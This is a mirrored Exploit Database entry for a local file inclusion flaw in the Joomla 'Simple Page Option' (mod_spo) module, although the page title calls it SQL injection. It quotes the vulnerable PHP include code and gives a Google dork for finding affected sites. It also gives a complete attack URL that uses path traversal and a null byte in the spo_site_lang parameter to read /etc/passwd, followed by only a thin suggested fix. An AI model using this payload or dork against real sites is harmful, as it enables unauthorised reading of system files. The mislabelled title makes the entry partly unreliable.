Joomla! Component mod_spo – SQL Injection

• Exploit Database
• 14 阅读

• 作者： SeguridadBlanca
  日期： 2011-07-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17560/

• # Exploit Title: Simple Page Option LFI
  # Google Dork: inurl:mod_spo
  # Date: 15/07/2011
  # Author: SeguridadBlanca.Blogspot.com or SeguridadBlanca
  # Software Link: http://joomlacode.org/gf/download/frsrelease/11841/47776/mod_spo_1.5.16.zip
  # Version: 1.5.x
  # Tested on: Backtrack and Windows 7
  
  Simple Page Option – LFI
  Vulnerable-Code:
  $s_lang
  =& JRequest::getVar('spo_site_lang');
  (file_exists(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php'))
  ? include(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php')
  : include(dirname(__FILE__).DS.'languages'.DS.'english.php');
  Vulnerable-Var:
  spo_site_lang=
  
  Expl0iting:
  http://www.xxx.com/home/modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using
  %20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd% 00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&spo_url2se
  
  Reparing?:
  Just Filter with str_replace(); or htaccess protection to the vulnerable file.
  
  gr33tz: Alfredo Arauz, SeguridadBlanca.Blogspot.com, Ecuador and Perú Security.